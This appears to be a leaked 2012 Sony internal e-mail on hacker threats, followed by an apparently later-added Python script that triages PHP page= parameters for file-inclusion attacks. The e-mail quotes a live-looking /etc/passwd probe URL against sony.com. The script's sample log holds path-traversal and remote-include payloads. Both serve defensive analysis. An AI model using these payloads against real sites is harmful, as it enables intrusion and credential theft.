
From: Reitinger, Philip
Sent: Thursday, January 12, 2012 9:16 AM
To: Rice, Carolyn, Sony Music; Williams, Michael T (Law); 'jonathan.pearl@sonyericsson.com'; 'azaffron@soe.sony.com'; Weil, Leah; Traymore, Anthony (Legal); Takei, Natsuko; Gardner, Thomas; 'Paul.Stephens@sonyericsson.com'; Spaltro, Jason; Patel, Ajay; Delorenzo, Mark (SGS); Schwab, Ray; McLaughlin, Bob; Bernard, Stevan; Harkins, Jason; Leak, Wade, Sony Music; Russell, Riley (SCEA); Sterner, Charles; Wahlin, Brett; bblank (@soe); Podorowsky, Gary; Marong, Guy; Soulia, Sheila; Matsumoto, Keiichi; Shigenari, Masanobu; Seligman, Nicole; Ciesla, John
Subject: RE: PRIVILEGED and CONFIDENTIAL - threat data Jan 11
Attachments: EAS

Privileged and Confidential


Please do not distribute. Please note that this new report references an attacker assertion that Sony.com has been compromised too, along with sonypictures.com and sonyatv.com.
There is additional information about several possible vulnerabilities. There is also some possible information about the source of the threat - do not distribute this.
Note also some red information about an older (I think) issue with sony.com: http://www.sony.com/utilities/printable.php?page=/etc/passwd - possible RFI? This should be checked. If there is a possible RFI, a shell could be uploaded. A cursory glance at the page returned a 403 error. This was checked in more detail today by one of the analysts. PHP could be used to read the password file if appropriate permissions are not set for the PHP processes. ICG recommends checking this.
Last, below is the information we received from the consultant.
Phil
Verification is not complete; however, what was learned is contained in the SPOTREP. We engaged those who we have assessed to be the two main skilled hackers for the last 9 hours, as they have been available and responsive. This is a tedious process and is not proceeding as expeditiously as expected. This resulted in increased information and access to a new private paste pad and private IRC channel, and also to what is alleged to be one of the attack platforms. New information is contained in the report and attached for your review.
Summary of findings to date:
1. One of the two hackers, MonsteR, has a machine that geo-locates in the Netherlands. We were able to connect to his machine by IP address. That said, the owner claims he lives in the UK and is apparently using a remote host in the Netherlands.
2. The vulnerability we previously reported on the Sony site in the Middle East appears to be accurate. In spite of this, the server has NOT yet been compromised, but it is vulnerable. The exact vulnerability is included in the report, and the location on the server that is vulnerable is listed as well. If there are other sites hosted there, they may be vulnerable as well.
In spite of early promises to reveal information yesterday, all other claims remain unverified presently, with promised information and access still forthcoming. We do have significantly increased access and have formed a stronger relationship with the two hackers. We are to meet online again today, when exchange of additional attack details is promised to ensure there is no duplication of efforts. Therefore, we should have more details as the day progresses.

Black_risker is ADAMANT, however, that he has already rooted SonyPictures.com and Sony.com; we have gotten him to promise to show/explain what/how, but are still waiting as indicated above.
Finally, due to the easy access of anyone joining the irc.anonops.li #opsony channel, there is a colorful and many times unreliable array of users in that channel. If independently monitoring that chatter, it is recommended that information there be verified in some form or fashion. There was an antagonist/prankster in that channel last night suggesting that an OpSony attack was imminent. That was a false assertion, and the individual's motivation is unclear. They are fully aware that monitoring is going on in those channels and sometimes they provide disinformation for that very reason. There are key nicks associated with various parts of the plan or in overall control, as we have noted. We can PM these nicks if clarification is needed; however, the statements seen last night should originate from one of those nicks when execution actually occurs. Finally, they have seemed adamant since the start that their advertised timeline was a priority component they were unwilling to compromise.
More updates today as further information is available.

Attachments:
SONY SPOTREP 01112012.pdf (895168 Bytes)
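The URL Phil flags above puts a filesystem path straight into the `page` parameter of printable.php. Whether that is usable only to read a local file such as /etc/passwd or also to pull a shell from an attacker-controlled URL depends on how the handler consumes the parameter, and a single 403 on one probe does not settle either question. The script below is an added triage example for this thread, not code from the e-mail, the consultant or Sony: it classifies `page=` values the way a weak `include()` handler would resolve them, shows the hardened allow-list lookup beside it, and runs the classifier over a few constructed access-log lines. The allow-list, template directory and log lines are assumptions made for illustration.

```python
"""Triage of a PHP ``page=`` parameter such as the one in
/utilities/printable.php?page=/etc/passwd.

Added example for this thread, not code from the e-mail, the consultant
or Sony.  The allow-list, template directory and log lines are constructed."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed for illustration: the pages printable.php is meant to render, and
# the directory a vulnerable handler would include them from.
ALLOWED_PAGES = {"about", "contact", "privacy"}
TEMPLATE_DIR = "/var/www/templates"

_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def _decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so %252e%252e (double-encoded ../) is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_page_param(value: str) -> str:
    """Classify a raw page= value as a weak include($dir.'/'.$page) treats it:
    'allowed'   - a name on the allow-list inside TEMPLATE_DIR
    'lfi'       - absolute path or ../ escape that reads a local file
                  (the /etc/passwd probe in the e-mail is this case)
    'rfi'       - URL or stream wrapper (http://, ftp://, php://, data://)
                  that include() would fetch; this is the shell-upload path
    'null-byte' - %00 truncation attempt against an appended suffix
    'unknown'   - anything else, worth a manual look"""
    v = _decode(value)
    if not v:
        return "unknown"
    if "\x00" in v:
        return "null-byte"
    if _SCHEME_RE.match(v):
        return "rfi"
    # Resolve the path exactly as the weak handler's include() would.
    resolved = posixpath.normpath(posixpath.join(TEMPLATE_DIR, v))
    if v.startswith("/") or not resolved.startswith(TEMPLATE_DIR + "/"):
        return "lfi"
    if v in ALLOWED_PAGES:
        return "allowed"
    return "unknown"


def safe_template_path(value: str):
    """The hardened handler: page= selects from a fixed set and is never
    used as a path fragment.  Returns the file to render, or None to refuse."""
    name = _decode(value)
    if name not in ALLOWED_PAGES:
        return None
    return posixpath.join(TEMPLATE_DIR, name + ".html")


# Constructed Apache-style access-log lines (not real Sony traffic).  The 403
# on the second line is the kind of "cursory glance" result the e-mail
# mentions; it says nothing about the 200 the encoded traversal gets next.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jan/2012:22:14:03 +0000] "GET /utilities/printable.php?page=about HTTP/1.1" 200 5120',
    '203.0.113.7 - - [11/Jan/2012:22:14:09 +0000] "GET /utilities/printable.php?page=/etc/passwd HTTP/1.1" 403 211',
    '198.51.100.23 - - [11/Jan/2012:22:15:41 +0000] "GET /utilities/printable.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1873',
    '198.51.100.23 - - [11/Jan/2012:22:16:02 +0000] "GET /utilities/printable.php?page=http://198.51.100.23/c.txt HTTP/1.1" 500 0',
    '192.0.2.5 - - [11/Jan/2012:22:17:30 +0000] "GET /index.php HTTP/1.1" 200 9001',
]

_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3})'
)


def triage_access_log(lines):
    """Return (ip, status, classification) for every printable.php request
    that carries a page= parameter."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/utilities/printable.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("page", []):
            findings.append((m.group("ip"), int(m.group("status")),
                             classify_page_param(raw)))
    return findings


if __name__ == "__main__":
    for ip, status, verdict in triage_access_log(SAMPLE_LOG):
        print(f"{ip:15} {status} {verdict}")
```

The classifier separates the two things the thread runs together: an `lfi` verdict means the parameter reaches the local filesystem (which is what the /etc/passwd probe tests, and what "read the password file" would exploit), while an `rfi` verdict means `include()` is being handed a URL or stream wrapper, which is the only case where a shell can be fetched from outside. The status column is kept deliberately, because a 403 on one encoding and a 200 on another is exactly the pattern a single manual probe misses.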
